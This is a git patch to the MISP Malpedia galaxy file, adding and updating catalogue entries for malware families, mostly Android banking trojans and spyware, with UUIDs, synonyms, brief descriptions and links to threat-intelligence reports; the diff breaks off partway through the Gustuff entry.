From f02ce7e8056262c92830520ef3b9fe783a20557d Mon Sep 17 00:00:00 2001 From: Jakob M Date: Fri, 12 Mar 2021 10:35:12 +0100 Subject: [PATCH] update to latest Ref: https://malpedia.caad.fkie.fraunhofer.de/api/get/misp --- clusters/malpedia.json | 17759 ++++++++++++++++++++++++++++++++++++--- 1 file changed, 16380 insertions(+), 1379 deletions(-) diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 09c02f1..7974a14 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -6,8 +6,7 @@ "Andrea Garavaglia", "Andras Iklody", "Daniel Plohmann", - "Christophe Vandeplas", - "Rmkml" + "Christophe Vandeplas" ], "category": "tool", "description": "Malware galaxy cluster based on Malpedia.", @@ -21,9 +20,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash", - "https://www.us-cert.gov/ncas/alerts/TA18-275A", "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/", - "https://github.com/fboldewin/FastCashMalwareDissected/" + "https://github.com/fboldewin/FastCashMalwareDissected/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", + "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware", + "https://www.us-cert.gov/ncas/alerts/TA18-275A", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.youtube.com/watch?v=zGvQPtejX9w" ], "synonyms": [], "type": [] @@ -31,6 +38,34 @@ "uuid": "e8a04177-6a91-46a6-9f63-6a9fac4dfa02", "value": "FastCash" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/" + ], + "synonyms": [ + "AxeSpy" + ], + "type": [] + }, + "uuid": "5c7a35bf-e5f1-4b07-b93a-c3608cc9142e", + "value": "ActionSpy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adobot", + "https://twitter.com/LukasStefanko/status/1243198756981559296" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d95708e9-220a-428c-b126-a63986099892", + "value": "AdoBot" + }, { "description": "", "meta": { @@ -44,14 +79,46 @@ "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", "value": "AdultSwine" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth", + "https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/", + "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", + "https://www.secrss.com/articles/24995", + "https://securelist.com/transparent-tribe-part-2/98233/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "86a5bb47-ac59-449a-8ff2-ae46e19cc6d2", + "value": "AhMyth" + }, + { + "description": "According to ThreatFabric, this is a fork of Cerberus v1 (active January 2020+). Alien is a rented banking trojan that can remotely control a phone and achieves RAT functionality by abusing TeamViewer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien", + "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html", + "https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "de483b10-4247-46b3-8ab5-77d089f0145c", + "value": "Alien" + }, { "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", - "https://github.com/DesignativeDave/androrat", "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/", + "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", + "https://github.com/DesignativeDave/androrat", + "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], "synonyms": [], @@ -65,26 +132,38 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis", + "https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb", "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", - "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/", - "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", + "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus", "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", - "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", - "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html", - "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/", - "https://pentest.blog/n-ways-to-unpack-mobile-malware/", "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis", - "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html", - "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html" + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/", + "https://www.youtube.com/watch?v=U0UsfO-0uJM", + "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", + "https://securelist.com/mobile-malware-evolution-2019/96280/", + "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/", + "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html", + "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html", + "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", + "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html", + "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ", + "https://community.riskiq.com/article/85b3db8c", + "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", + "https://pentest.blog/n-ways-to-unpack-mobile-malware/", + "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html" ], "synonyms": [ - "BankBot" + "BankBot", + "android.bankbot", + "android.bankspy" ], "type": [] }, "uuid": "85975621-5126-40cb-8083-55cbfa75121b", - "value": "Anubis" + "value": "Anubis (Android)" }, { "description": "", @@ -105,7 +184,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.asacub", - "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" + "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "https://securelist.com/mobile-malware-evolution-2019/96280/" ], "synonyms": [], "type": [] @@ -113,12 +193,67 @@ "uuid": "dffa06ec-e94f-4fd7-8578-2a98aace5473", "value": "Asacub" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ashas", + "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aabcfbb6-6385-486d-a30b-e3a2edcf493d", + "value": "Ashas" + }, + { + "description": "According to Lukas Stefanko, this is an open-source crypto-ransomware found on Github in 2018.\r\nIT can en/decrypt files (AES, key: 32 random chars, sent to C&C), uses email as contact point but will remove all files after 24 hours or after a reboot.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.atank", + "https://twitter.com/LukasStefanko/status/1268070798293708800" + ], + "synonyms": [], + "type": [] + }, + "uuid": "231f9f49-6752-49af-9ee0-7774578fcbe4", + "value": "ATANK" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.badcall", + "https://www.us-cert.gov/ncas/analysis-reports/ar19-252a" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5eec00de-5d81-4907-817d-f99cb33d9b66", + "value": "BADCALL (Android)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.badpatch", + "https://www.welivesecurity.com/2020/07/14/welcome-chat-secure-messaging-app-nothing-further-truth/" + ], + "synonyms": [ + "WelcomeChat" + ], + "type": [] + }, + "uuid": "9b96e274-1602-48a4-8e0d-9f756d4e835b", + "value": "BadPatch" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], @@ -128,11 +263,25 @@ "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Android)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.basbanke", + "https://twitter.com/LukasStefanko/status/1280243673100402690" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c59b65d6-d363-4b19-b082-d72508e782c0", + "value": "Basbanke" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian", + "https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html", "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html" ], "synonyms": [], @@ -141,6 +290,33 @@ "uuid": "1faaa5c5-ab4e-4101-b2d9-0e12207d70fc", "value": "BianLian" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.blackrock", + "https://www.threatfabric.com/blogs/blackrock_the_trojan_that_wanted_to_get_them_all.html", + "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2f3f82f6-ec21-489e-8257-0967c567798a", + "value": "BlackRock" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata", + "https://securelist.com/spying-android-rat-from-brazil-brata/92775/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d9ff080d-cde0-48da-89db-53435c99446b", + "value": "BRATA" + }, { "description": "", "meta": { @@ -154,6 +330,19 @@ "uuid": "4bf68bf8-08e5-46f3-ade5-0bd4f124b168", "value": "BusyGasper" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.carbonsteal", + "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "56090c0b-2b9b-4624-8eff-ef6d3632fd2b", + "value": "CarbonSteal" + }, { "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions.", "meta": { @@ -168,11 +357,38 @@ "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", "value": "Catelites" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus", + "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html", + "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/", + "https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/", + "https://community.riskiq.com/article/85b3db8c", + "https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/", + "https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf", + "https://github.com/ics-iot-bootcamp/cerberus_research", + "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + "https://twitter.com/AndroidCerberus" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c3a2448f-bb41-4201-b524-3ddcb02ddbf4", + "value": "Cerberus" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois", + "https://github.com/maddiestone/ConPresentations/blob/master/KasperskySAS2019.Chamois.pdf", "https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html", "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/" ], @@ -202,11 +418,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", - "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", + "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/", "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", "https://media.ccc.de/v/33c3-7901-pegasus_internals", - "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/", - "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", + "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/", + "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf" ], "synonyms": [ "JigglyPuff", @@ -245,6 +463,19 @@ "uuid": "ff9b47c6-a5b5-4531-abfc-2e4db3dcdc7e", "value": "Clipper" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cloudatlas", + "https://web.archive.org/web/20160710180729/https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ed780667-b67c-4e17-ab43-db1b7e018e66", + "value": "CloudAtlas" + }, { "description": "", "meta": { @@ -273,6 +504,20 @@ "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", "value": "Connic" }, + { + "description": "Poses as an app that can offer a \"corona safety mask\" but phone's address book and sends sms to contacts, spreading its own download link.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.corona_worm", + "https://dissectingmalwa.re/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html", + "https://www.zscaler.com/blogs/research/new-android-app-offers-coronavirus-safety-mask-delivers-sms-trojan" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f041032e-01af-4e66-9fb2-f8da88a6ea35", + "value": "Coronavirus Android Worm" + }, { "description": "", "meta": { @@ -286,6 +531,94 @@ "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", "value": "Cpuminer (Android)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.crycryptor", + "https://www.welivesecurity.com/2020/06/24/new-ransomware-uses-covid19-tracing-guise-target-canada-eset-decryptor/" + ], + "synonyms": [ + "CryCrypter", + "CryDroid" + ], + "type": [] + }, + "uuid": "21e9d7e6-6e8c-49e4-8869-6bac249cda8a", + "value": "CryCryptor" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.darkshades", + "https://twitter.com/LukasStefanko/status/1252163657036976129" + ], + "synonyms": [ + "Rogue" + ], + "type": [] + }, + "uuid": "97fe35c9-f50c-495f-8736-0ecd95c70192", + "value": "Dark Shades" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.defensor_id", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/" + ], + "synonyms": [ + "Defensor Digital" + ], + "type": [] + }, + "uuid": "76346e4d-d14e-467b-9409-82b28a4d6cd6", + "value": "DEFENSOR ID" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dendroid", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a29d7d7a-f150-46cf-9bb9-a1f9f4d32a80&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + ], + "synonyms": [], + "type": [] + }, + "uuid": "89989df2-e8bc-4074-a8a2-130a15d6625f", + "value": "Dendroid" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dmsspy", + "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/", + "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "72a25832-4bf4-4505-a77d-8c0fc52dc85d", + "value": "dmsSpy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doubleagent", + "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "73fd1bda-e4aa-4777-a628-07580bc070f4", + "value": "DoubleAgent" + }, { "description": "", "meta": { @@ -299,6 +632,19 @@ "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c", "value": "DoubleLocker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.droidjack", + "https://www.stratosphereips.org/blog/2021/1/22/analysis-of-droidjack-v44-rat-network-traffic" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8990cec7-ddd8-435e-97d6-5b36778e86fe", + "value": "DroidJack" + }, { "description": "", "meta": { @@ -317,6 +663,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap", + "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" ], "synonyms": [], @@ -325,6 +672,21 @@ "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", "value": "Dvmap" }, + { + "description": "According to ThreatFabric, the app overlays 15 financial targets from UK, Italy, and Spain, sniffs 234 apps from banks located in Europe as well as crypto wallets.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.eventbot", + "https://twitter.com/ThreatFabric/status/1240664876558823424", + "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "https://www.youtube.com/watch?v=qqwOrLR2rgU" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5a6fb8cd-d582-4c8c-b7e0-a5b4cf4f248f", + "value": "Eventbot" + }, { "description": "", "meta": { @@ -345,6 +707,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus", "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv", "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store" ], "synonyms": [], @@ -358,8 +721,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/" + "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681" ], "synonyms": [], "type": [] @@ -382,6 +746,36 @@ "uuid": "6c0fc7e4-4629-494f-b471-f7a8cc47c0e0", "value": "FakeGram" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.filecoder", + "https://www.welivesecurity.com/2019/07/29/android-ransomware-back/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "09ff3520-b643-44bd-a0de-90c0e75ba12f", + "value": "FileCoder" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.finfisher", + "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf", + "https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/", + "https://github.com/linuzifer/FinSpy-Dokumentation", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0bf7acd4-6493-4126-9598-d2ed069e32eb", + "value": "FinFisher (Android)" + }, { "description": "", "meta": { @@ -400,6 +794,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", + "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://twitter.com/LukasStefanko/status/886849558143279104" ], "synonyms": [ @@ -410,6 +805,80 @@ "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f", "value": "FlexNet" }, + { + "description": "PRODAFT describes FluBot as a banking malware, targeting Spain and potentially German-, Polish-, and English-speaking users. It uses a DGA for it's C&C.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot", + "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9", + "https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ef91833f-3334-4955-9218-f106494e9fc0", + "value": "FluBot" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.funkybot", + "https://www.fortinet.com/blog/threat-research/funkybot-malware-targets-japan.html", + "https://securelist.com/roaming-mantis-part-v/96250/", + "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bc0d37fa-113a-45ba-8a1c-b9d818e31f27", + "value": "FunkyBot" + }, + { + "description": "According to Check Point, they uncovered an operation dubbed \"Domestic Kitten\", which uses malicious Android applications to steal sensitive personal information from its victims: screenshots, messages, call logs, surrounding voice recordings, and more. This operation managed to remain under the radar for a long time, as the associated files were not attributed to a known malware family and were only detected by a handful of security vendors.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball", + "https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html", + "https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/", + "https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program", + "https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf", + "https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/", + "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "53282cc8-fefc-47d7-b6a5-a82a05a88f2a", + "value": "FurBall" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.geost", + "https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/", + "https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b9639878-733c-4f30-9a13-4680a7e17415", + "value": "Geost" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghimob", + "https://securelist.com/ghimob-tetrade-threat-mobile-devices/99228/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3d1f2591-05fe-42f4-aaf8-ed1428f17605", + "value": "Ghimob" + }, { "description": "", "meta": { @@ -423,13 +892,30 @@ "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", "value": "GhostCtrl" }, + { + "description": "Ginp is a mobile banking software targeting Android devices that was discovered by Kaspersky. The malware is able to steal both user credentials and credit cards numbers by implementing overlay attacks. For this, overlay targets are for example the default SMS application. What makes Ginp a remarkable family is how its operators managed to have it remain undetected over time even and it receiving version upgrades over many years. According to ThreatFabric, Ginp has the following features:\r\n\r\nOverlaying: Dynamic (local overlays obtained from the C2)\r\nSMS harvesting: SMS listing\r\nSMS harvesting: SMS forwarding\r\nContact list collection\r\nApplication listing\r\nOverlaying: Targets list update\r\nSMS: Sending\r\nCalls: Call forwarding\r\nC2 Resilience: Auxiliary C2 list\r\nSelf-protection: Hiding the App icon\r\nSelf-protection: Preventing removal\r\nSelf-protection: Emulation-detection.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ginp", + "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/", + "https://www.youtube.com/watch?v=WeL_xSryj8E", + "https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/", + "https://twitter.com/ESETresearch/status/1269945115738542080", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "77e9ace0-f6e5-4d6e-965a-a653ff626be1", + "value": "Ginp" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove", "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773", - "https://www.ci-project.org/blog/2017/3/4/arid-viper", "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", "https://www.clearskysec.com/glancelove/" @@ -440,6 +926,19 @@ "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", "value": "GlanceLove" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldeneagle", + "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b7c0c11d-8471-4b10-bbf2-f9c0f30bc27e", + "value": "GoldenEagle" + }, { "description": "", "meta": { @@ -472,8 +971,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff", + 